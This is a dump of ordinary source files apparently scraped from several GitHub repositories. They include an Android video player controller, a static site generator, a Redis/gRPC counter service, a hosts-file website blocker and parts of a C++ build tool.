KyVideoPlayer.STATE_PREPARING:\n //只显示动画,其他不显示\n mImage.setVisibility(View.GONE);\n ll_mLoading.setVisibility(View.VISIBLE);\n mLoadText.setText(\"正在准备...\");\n ll_mError.setVisibility(View.GONE);\n ll_mCompleted.setVisibility(View.GONE);\n ll_mTop.setVisibility(View.GONE);\n mCenterStart.setVisibility(View.GONE);\n break;\n case KyVideoPlayer.STATE_PREPARED:\n startUpdateProgressTimer();\n break;\n case KyVideoPlayer.STATE_PLAYING:\n ll_mLoading.setVisibility(View.GONE);\n mRestartPause.setImageResource(R.drawable.ic_player_pause);\n startDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_PAUSED:\n ll_mLoading.setVisibility(View.GONE);\n mRestartPause.setImageResource(R.drawable.ic_player_start);\n cancelDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_BUFFERING_PLAYING:\n ll_mLoading.setVisibility(View.VISIBLE);\n mRestartPause.setImageResource(R.drawable.ic_player_pause);\n mLoadText.setText(\"正在缓冲...\");\n startDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_BUFFERING_PAUSED:\n ll_mLoading.setVisibility(View.VISIBLE);\n mRestartPause.setImageResource(R.drawable.ic_player_start);\n mLoadText.setText(\"正在缓冲...\");\n cancelDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_COMPLETED:\n cancelUpdateProgressTimer();\n setTopBottomVisible(false);\n mImage.setVisibility(View.VISIBLE);\n ll_mCompleted.setVisibility(View.VISIBLE);\n if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n }\n if (mKyVideoPlayer.isTinyWindow()) {\n mKyVideoPlayer.exitTinyWindow();\n }\n break;\n case KyVideoPlayer.STATE_ERROR:\n cancelUpdateProgressTimer();\n setTopBottomVisible(false);\n ll_mTop.setVisibility(View.VISIBLE);\n ll_mError.setVisibility(View.VISIBLE);\n break;\n }\n }\n\n private void startUpdateProgressTimer() {\n cancelUpdateProgressTimer();\n if (mUpdateProgressTimer == null) {\n mUpdateProgressTimer = new Timer();\n }\n if (mUpdateProgressTimerTask == null) {\n mUpdateProgressTimerTask = new TimerTask() {\n @Override\n public void run() {\n KyVideoPlayerController.this.post(new Runnable() {\n @Override\n public void run() {\n updateProgress();\n }\n });\n }\n };\n }\n mUpdateProgressTimer.schedule(mUpdateProgressTimerTask, 0, 300);\n }\n\n private void updateProgress() {\n int position = mKyVideoPlayer.getCurrentPosition();\n int duration = mKyVideoPlayer.getDuration();\n int bufferPercentage = mKyVideoPlayer.getBufferPercentage();\n mSeek.setSecondaryProgress(bufferPercentage);\n int progress = (int) (100f * position / duration);\n mSeek.setProgress(progress);\n mPosition.setText(VideoUtil.formatTime(position));\n mDuration.setText(VideoUtil.formatTime(duration));\n }\n\n private void cancelUpdateProgressTimer() {\n if (mUpdateProgressTimer != null) {\n mUpdateProgressTimer.cancel();\n mUpdateProgressTimer = null;\n }\n if (mUpdateProgressTimerTask != null) {\n mUpdateProgressTimerTask.cancel();\n mUpdateProgressTimerTask = null;\n }\n }\n\n @Override\n public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {\n\n }\n\n @Override\n public void onStartTrackingTouch(SeekBar seekBar) {\n cancelDismissTopBottomTimer();\n }\n\n @Override\n public void onStopTrackingTouch(SeekBar seekBar) {\n if (mKyVideoPlayer.isBufferingPaused() || mKyVideoPlayer.isPaused()) {\n mKyVideoPlayer.restart();\n }\n int position = (int)(mKyVideoPlayer.getDuration() * seekBar.getProgress() / 100f);\n mKyVideoPlayer.seekTo(position);\n startDismissTopBottomTimer();\n }\n\n /**\n * 控制器恢复到初始状态\n */\n public void reset() {\n topBottomVisible = false;\n cancelUpdateProgressTimer();\n cancelDismissTopBottomTimer();\n mSeek.setProgress(0);\n mSeek.setSecondaryProgress(0);\n\n mCenterStart.setVisibility(View.VISIBLE);\n mImage.setVisibility(View.VISIBLE);\n\n ll_mBottom.setVisibility(View.GONE);\n mFullScreen.setImageResource(R.drawable.ic_player_enlarge);\n\n ll_mTop.setVisibility(View.VISIBLE);\n mBack.setVisibility(View.GONE);\n\n ll_mLoading.setVisibility(View.GONE);\n ll_mError.setVisibility(View.GONE);\n ll_mCompleted.setVisibility(View.GONE);\n }\n}\n" } ]
11
fahadahammed/ThawPY
https://github.com/fahadahammed/ThawPY
5f89a216f996c98356d476f149b6bc3ff95b67a9
4669267472d6e2f68cf5cda53043266a326efb67
3b8200b8dd0dcb7885ef11cfeadd28029bbbd4ee
refs/heads/master
2020-09-05T20:31:10.323778
2019-11-07T11:50:16
2019-11-07T11:50:16
220,206,356
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6280487775802612, "alphanum_fraction": 0.6353658437728882, "avg_line_length": 29.370370864868164, "blob_id": "4a0cbe6666de0aa123bff7dcc73dbe1b26c95437", "content_id": "9ce39a280262005f20b14fa058f3b6525411c263", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "permissive", "max_line_length": 104, "num_lines": 27, "path": "/setup.py", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='ThawPY',\n version='1.0',\n url='https://github.com/fahadahammed/ThawPY',\n license='MIT License ',\n author='Fahad Ahammed',\n author_email='[email protected]',\n description=\"\"\"ThawPY is for you if you want to make markdown to html files with predefined design. \n It is just like a static site generator.\"\"\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"\n ],\n install_requires=[\n 'pytz', 'markdown', 'jinja2'\n ],\n python_requires='>=3.6'\n)\n" }, { "alpha_fraction": 0.6172839403152466, "alphanum_fraction": 0.636214017868042, "avg_line_length": 26.636363983154297, "blob_id": "29a192b8f885c1d37a697896bc4503914069e356", "content_id": "5883945b813f7ce6f9c36a3db32ded5536fa1404", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1215, "license_type": "permissive", "max_line_length": 129, "num_lines": 44, "path": "/thaw.py", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "# Project ThawPY is developed by Fahad Ahammed on 11/7/19, 4:40 PM.\n#\n# Last modified at 11/7/19, 4:33 PM.\n#\n# Github: fahadahammed\n# Email: [email protected]\n#\n# Copyright (c) 2019. All rights reserved.\n\nimport datetime\nimport pytz\nimport os\nimport sys\nimport json\nimport jinja2\n\n\nclass Thaw:\n def __init__(self, site_source=None):\n self.time_zone = \"Asia/Dhaka\"\n self.site_source = \"./thaw/templates\"\n\n def list_of_files(self):\n to_return = []\n for root, dirs, files in os.walk(self.site_source):\n for filename in files:\n to_return.append(filename)\n return to_return\n\n def generate_html(self):\n title = \"Thaw Site Generator !\"\n user_name = \"Fahad Ahammed\"\n templateLoader = jinja2.FileSystemLoader(searchpath=self.site_source)\n templateEnv = jinja2.Environment(loader=templateLoader)\n TEMPLATE_FILE = \"page.html\"\n template = templateEnv.get_template(TEMPLATE_FILE)\n outputText = template.render(site_title=title, user_name=user_name) # this is where to put args to the template renderer\n\n return outputText\n\n\nif __name__ == \"__main__\":\n # print(Thaw().list_of_files())\n print(Thaw().generate_html())" }, { "alpha_fraction": 0.7910447716712952, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 66.5, "blob_id": "f3f3789bad0cce3372b932d3cfb539ed7ec58e3c", "content_id": "a5d59c8a074d697a02843303ffc9619f03c880bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "permissive", "max_line_length": 125, "num_lines": 2, "path": "/README.md", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "# ThawPY\nThawPY is for you if you want to make markdown to html files with predefined design. It is just like a static site generator." } ]
3
VitoVan/demo-service-counter
https://github.com/VitoVan/demo-service-counter
6f4824734b1eaff0b39970946323a2120a4ca017
54875f1130a3c79d8ff9634d3fd96428660fd8cb
b637e9a6ff74cdd0873048ed83c4fca5edabe5df
refs/heads/master
2020-11-26T09:07:22.069524
2020-02-26T11:17:02
2020-02-28T10:06:23
229,024,916
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5056521892547607, "alphanum_fraction": 0.5173913240432739, "avg_line_length": 31.394365310668945, "blob_id": "28b31ecbd423886fccddc040e68a299dccc25c37", "content_id": "72047d925aa370eb154e9d2d857899f5c291f8dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 69, "num_lines": 71, "path": "/http_server.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "from http.server import BaseHTTPRequestHandler, HTTPServer\nimport redis\nimport os\nimport grpc\n\nimport counter_pb2\nimport counter_pb2_grpc\n\n\nclass Server(BaseHTTPRequestHandler):\n\n def __init__(self, *args, **kwargs):\n self.name = 'counter'\n if os.environ['HTTP_BACKEND'] == 'GRPC':\n self.backend = 'grpc'\n else:\n self.backend = 'redis'\n\n if self.backend == 'redis':\n self.r = redis.Redis(host='localhost', port=6379,\n db=0, decode_responses=True)\n elif self.backend == 'grpc':\n self.g = counter_pb2_grpc.CounterStub(\n grpc.insecure_channel('localhost:50051'))\n super().__init__(*args, **kwargs)\n\n def get(self):\n if self.backend == 'redis':\n return self.r.get('counter')\n else:\n header_metadata = tuple([(k.lower(), v)\n for k, v in self.headers.items()\n if k.startswith('x-')])\n response, call = self.g.get.with_call(\n counter_pb2.CounterRequest(name='counter'),\n metadata=header_metadata)\n return response.count\n\n def incr(self):\n if self.backend == 'redis':\n return self.r.incr('counter')\n else:\n header_metadata = tuple([(k.lower(), v)\n for k, v in self.headers.items()\n if k.startswith('x-')])\n response, call = self.g.incr.with_call(\n counter_pb2.CounterRequest(name='counter'),\n metadata=header_metadata)\n return response.count\n\n def do_GET(self):\n print(self.headers)\n count = self.get()\n self.resp(f'{{ \"count\": \"{count}\" }}')\n\n def do_PUT(self):\n print(self.headers)\n count = self.incr()\n self.resp(f'{{ \"count\": \"{count}\" }}')\n\n def resp(self, msg):\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(msg, 'UTF-8'))\n\n\nif __name__ == '__main__':\n server = HTTPServer(('0.0.0.0', 80), Server)\n print('Starting server @ 80, use <Ctrl-C> to stop')\n server.serve_forever()\n" }, { "alpha_fraction": 0.606249988079071, "alphanum_fraction": 0.606249988079071, "avg_line_length": 28.090909957885742, "blob_id": "1ef202d4449d3f0d22f38e39b9b2643a504385a7", "content_id": "19252af32cdbee01cf70ff5da5b7f2f16d4421f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 320, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/start.sh", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "if [[ \"$SERVER_TYPE\" == \"GRPC\" ]]; then\n python grpc_server.py\nelif [[ \"$SERVER_TYPE\" == \"HTTP\" ]]; then\n if [[ \"$HTTP_BACKEND\" == \"GRPC\" ]]; then\n HTTP_BACKEND=GRPC python http_server.py\n else\n HTTP_BACKEND=REDIS python http_server.py\n fi\nelse\n HTTP_BACKEND=REDIS python http_server.py\nfi\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.6900050640106201, "avg_line_length": 30.285715103149414, "blob_id": "4192e9f97debb3a739ba8d19574c5d00e74adeec", "content_id": "cfa21e8a0c71f752a4dbd0151f5f0a8d3d2b0222", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/counter_pb2_grpc.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\nimport grpc\n\nimport counter_pb2 as counter__pb2\n\n\nclass CounterStub(object):\n \"\"\"The Counter service definition.\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.incr = channel.unary_unary(\n '/demo.counter.Counter/incr',\n request_serializer=counter__pb2.CounterRequest.SerializeToString,\n response_deserializer=counter__pb2.CounterReply.FromString,\n )\n self.get = channel.unary_unary(\n '/demo.counter.Counter/get',\n request_serializer=counter__pb2.CounterRequest.SerializeToString,\n response_deserializer=counter__pb2.CounterReply.FromString,\n )\n\n\nclass CounterServicer(object):\n \"\"\"The Counter service definition.\n \"\"\"\n\n def incr(self, request, context):\n \"\"\"Add count\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def get(self, request, context):\n \"\"\"Get count\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CounterServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'incr': grpc.unary_unary_rpc_method_handler(\n servicer.incr,\n request_deserializer=counter__pb2.CounterRequest.FromString,\n response_serializer=counter__pb2.CounterReply.SerializeToString,\n ),\n 'get': grpc.unary_unary_rpc_method_handler(\n servicer.get,\n request_deserializer=counter__pb2.CounterRequest.FromString,\n response_serializer=counter__pb2.CounterReply.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'demo.counter.Counter', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7196969985961914, "avg_line_length": 32, "blob_id": "609723e5ba9b22b5f08622af8e8abe3c836ec314", "content_id": "74e0f0119a94a85a9651ee7d3ae71ced66ca1ead", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 132, "license_type": "no_license", "max_line_length": 74, "num_lines": 4, "path": "/Dockerfile", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "FROM python:3\nRUN pip install redis grpcio protobuf -i https://pypi.doubanio.com/simple/\nCOPY ./ ./\nENTRYPOINT [\"bash\", \"start.sh\"]\n" }, { "alpha_fraction": 0.6579925417900085, "alphanum_fraction": 0.6793680191040039, "avg_line_length": 29.742856979370117, "blob_id": "19bdb533c9ad79686b0613f1ffdeb828a86d5907", "content_id": "8e932a1bd9cec1f0ffe9377189c75b4a73460b13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 78, "num_lines": 35, "path": "/grpc_server.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "from concurrent import futures\nimport grpc\n\nimport counter_pb2\nimport counter_pb2_grpc\n\nimport redis\n\nr = redis.Redis(host='localhost', port=6379, db=0, decode_responses=True)\n\n\nclass Counter(counter_pb2_grpc.CounterServicer):\n\n def incr(self, request, context):\n for key, value in context.invocation_metadata():\n print('Received initial metadata: key=%s value=%s' % (key, value))\n return counter_pb2.CounterReply(count=str(r.incr(request.name)))\n\n def get(self, request, context):\n for key, value in context.invocation_metadata():\n print('Received initial metadata: key=%s value=%s' % (key, value))\n return counter_pb2.CounterReply(count=str(r.get(request.name)))\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n counter_pb2_grpc.add_CounterServicer_to_server(Counter(), server)\n server.add_insecure_port('[::]:50051')\n server.start()\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n print('Starting gRPC Server @ 50051, use <Ctrl-C> to stop')\n serve()\n" } ]
5
SubhadipNag/block-website
https://github.com/SubhadipNag/block-website
f9925be4228a578cf08eb111cf4ad1a071734fd1
3583eb4d5eea71ab8d5e315071b96deb32bd6ce4
47ac7e97d9b057dcba0d049293bc45a4e0185ae3
refs/heads/master
2022-04-18T05:24:04.951632
2020-03-27T13:34:12
2020-03-27T13:34:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8068965673446655, "alphanum_fraction": 0.8068965673446655, "avg_line_length": 47.33333206176758, "blob_id": "f598daa28dbcbe4daf708e9a76cbd02aa8d945d5", "content_id": "0189f3ebc458dcdcf001b4a62d18c77cca855712", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 591, "license_type": "no_license", "max_line_length": 186, "num_lines": 12, "path": "/README.md", "repo_name": "SubhadipNag/block-website", "src_encoding": "UTF-8", "text": "# block-website\nBloqueador de website feito em python\n\nO objetivo desse script é bloquear websites para você produzir mais ainda, como estudar, trabalhar e manter o seu foco e concentração\n\nVocê pode utilizar para outros fins também.\n\nRessaltando que ele modifica o arquivo \"hosts\" do sistema operacional, então para Windows e Linux só vai mudar o caminho do diretório\n\nRecomendo que você execute ele com privilégios administrativos e se preferir, pode fazer um script para que toda vez que for feito reboot ele executar e bloquear os sites automaticamente\n\n**Criado por Joas Antonio**\n" }, { "alpha_fraction": 0.48875802755355835, "alphanum_fraction": 0.4957173466682434, "avg_line_length": 41, "blob_id": "7b47c191f427e944800d114235fc44434a408efe", "content_id": "d3c8b15429166bffb54c3e5bda646580da1b331a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1873, "license_type": "no_license", "max_line_length": 177, "num_lines": 43, "path": "/block.py", "repo_name": "SubhadipNag/block-website", "src_encoding": "UTF-8", "text": "# Inicie esse script na raiz\r\n \r\nimport time \r\nfrom datetime import datetime as dt \r\n \r\n# Selecione o diretório hosts de sua máquina\r\n#hosts_path = \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\r\n#hosts_path = \"/etc/hosts\"\r\nhosts_path = str(input(\"Digite o caminho do diretório: \"))\r\n# IP Local\r\nredirect = \"127.0.0.1\"\r\n \r\n# Sites que vão ser bloqueados\r\nwebsite_list = [\"www.facebook.com\",\"facebook.com\", \"www.youtube.com\", \"web.whatsapp.com\", \"www.twitter.com\", \"www.instagram.com\", \"youtube.com\", \"twitter.com\", \"instagram.com\"] \r\ntry: \r\n while True: \r\n # Tempo de bloqueio \r\n if dt(dt.now().year, dt.now().month, dt.now().day,8)< dt.now() < dt(dt.now().year, dt.now().month, dt.now().day,16): \r\n print(\"Bloqueando...\") \r\n with open(hosts_path, 'r+') as file: \r\n content = file.read() \r\n for website in website_list: \r\n if website in content: \r\n pass\r\n else: \r\n # Mapeando hostnames para endereços locais \r\n file.write(redirect + \" \" + website + \"\\n\") \r\n else:\r\n with open(hosts_path, 'r+') as file: \r\n content=file.readlines() \r\n file.seek(0) \r\n for line in content: \r\n if not any(website in line for website in website_list): \r\n file.write(line)\r\nexcept KeyboardInterrupt: \r\n with open(hosts_path, 'r+') as file: \r\n content=file.readlines() \r\n file.seek(0) \r\n for line in content: \r\n if not any(website in line for website in website_list): \r\n file.write(line)\r\n file.truncate()\r\n print(\"Finish\") \r\n \r\n" } ]
2
SleepingCatGames/csbuild2
https://github.com/SleepingCatGames/csbuild2
5f265aec1a490e32503857bff5d1e139992a1652
c7389961bee3d8e5088c8c3c8c4bb7e273e4ec50
878e65a34f6b10ac81759ab87147022360bfd622
refs/heads/develop
2023-08-31T07:17:55.905512
2023-08-20T21:45:05
2023-08-20T21:45:05
100,565,406
1
1
null
2017-08-17T05:36:13
2022-02-20T18:51:52
2023-08-20T21:45:05
Python
[ { "alpha_fraction": 0.6683894395828247, "alphanum_fraction": 0.6712237596511841, "avg_line_length": 34.916168212890625, "blob_id": "569da80ee114db9d42d4e5b69e6fafbbce473064", "content_id": "6fbe03f8a65f30196f8b434a11592a791c91d665", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5998, "license_type": "no_license", "max_line_length": 131, "num_lines": 167, "path": "/csbuild/tools/cpp_compilers/msvc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_cpp_compiler\n\t:synopsis: msvc compiler tool for C++\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\nfrom ..common.msvc_tool_base import MsvcToolBase\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\ndef _ignore(_):\n\tpass\n\nclass MsvcCppCompiler(MsvcToolBase, CppCompilerBase):\n\t\"\"\"\n\tMSVC compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm64\" }\n\toutputFiles = { \".obj\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getEnv(self, project):\n\t\treturn self.vcvarsall.env\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\toutputPath = os.path.join(project.GetIntermediateDirectory(inputFile), os.path.splitext(os.path.basename(inputFile.filename))[0])\n\t\toutputFiles = [\"{}.obj\".format(outputPath)]\n\n\t\tif self._debugLevel in [DebugLevel.ExternalSymbols, DebugLevel.ExternalSymbolsPlus]:\n\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\t\t\tif self._debugLevel == DebugLevel.ExternalSymbolsPlus:\n\t\t\t\toutputFiles.append(\"{}.idb\".format(outputPath))\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmd = self._getDefaultArgs() \\\n\t\t\t+ self._getCustomArgs(project, isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getRuntimeLinkageArgs() \\\n\t\t\t+ self._getLanguageStandardArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getUwpArgs(project, isCpp) \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ [inputFile.filename]\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [self._exePath, \"@{}\".format(responseFile.filePath)]\n\n\tdef SetupForProject(self, project):\n\t\tMsvcToolBase.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\t\tself._exePath = os.path.join(self.vcvarsall.binPath, \"cl.exe\")\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self):\n\t\targs = [\"/nologo\", \"/c\", \"/Oi\", \"/GS\"]\n\t\tif self._optLevel == OptimizationLevel.Disabled:\n\t\t\targs.append(\"/RTC1\")\n\t\treturn args\n\n\tdef _getCustomArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn self._globalFlags + self._cxxFlags if isCpp else self._cFlags\n\n\tdef _getDebugArgs(self):\n\t\targ = {\n\t\t\tDebugLevel.EmbeddedSymbols: \"/Z7\",\n\t\t\tDebugLevel.ExternalSymbols: \"/Zi\",\n\t\t\tDebugLevel.ExternalSymbolsPlus: \"/ZI\",\n\t\t}\n\t\treturn [arg.get(self._debugLevel, \"\")]\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"/O1\",\n\t\t\tOptimizationLevel.Speed: \"/O2\",\n\t\t\tOptimizationLevel.Max: \"/Ox\",\n\t\t}\n\t\treturn [arg.get(self._optLevel, \"/Od\")]\n\n\tdef _getRuntimeLinkageArgs(self):\n\t\targ = \"/{}{}\".format(\n\t\t\t\"MT\" if self._staticRuntime else \"MD\",\n\t\t\t\"d\" if self._debugRuntime else \"\"\n\t\t)\n\t\treturn [arg]\n\n\tdef _getPreprocessorArgs(self):\n\t\tdefineArgs = [\"/D{}\".format(d) for d in self._defines]\n\t\tundefineArgs = [\"/U{}\".format(u) for u in self._undefines]\n\t\treturn defineArgs + undefineArgs\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"/I{}\".format(directory) for directory in self._includeDirectories]\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\targs = [\"/Fo{}\".format(filePath) for filePath in outputFiles if os.path.splitext(filePath)[1] in [\".obj\"]]\n\n\t\tif self._debugLevel in [DebugLevel.ExternalSymbols, DebugLevel.ExternalSymbolsPlus]:\n\t\t\targs.extend([\"/Fd{}\".format(filePath) for filePath in outputFiles if os.path.splitext(filePath)[1] in [\".pdb\"]])\n\n\t\treturn args\n\n\tdef _getLanguageStandardArgs(self):\n\t\t# No argument for the C language standard.\n\t\targ = \"/std:{}\".format(self._cxxStandard) if self._cxxStandard else None\n\t\treturn [arg]\n\n\tdef _getUwpArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\t_ignore(isCpp)\n\t\treturn []\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5517241358757019, "avg_line_length": 6, "blob_id": "b2f0bd18a3a37a543f5af822150ce48ad5226641", "content_id": "ae2bc42e0cc74f1d2d0f3b91bb525d660ae2c5b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 29, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/functional_tests/explicit_sources_test/project/source/correct/getnum.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\nint getnum()\n{\n\treturn 4;\n}\n" }, { "alpha_fraction": 0.7350475192070007, "alphanum_fraction": 0.736165463924408, "avg_line_length": 35.141414642333984, "blob_id": "66de89f096738dc10df742a23f8dc71983a325c5", "content_id": "0cb8ded4966c0ea5a2998c8b4c51b6d47a33e7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3578, "license_type": "no_license", "max_line_length": 102, "num_lines": 99, "path": "/csbuild/tools/common/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: common\n\t:synopsis: Abstract tools and functions that can be shared between other tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\n# Required to keep lint happy.\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom csbuild import log\n\ndef FindLibraries(libNames, libDirs, libExts):\n\t\"\"\"\n\tHelper function to explicitly search for libraries. This is needed by linker tools that cannot run a\n\tspecific executable for this.\n\n\t:param libNames: Library names to search for.\n\t:type libNames: list[str]\n\n\t:param libDirs: Library directories to search in.\n\t:type libDirs: list[str]\n\n\t:param libExts: File extensions (in priority order) to use in combination with library names.\n\t:type libExts: list[str]\n\n\t:return: Dictionary of library names to their full paths.\n\t:rtype: dict[str, str] or None\n\t\"\"\"\n\tnotFound = set()\n\tfound = 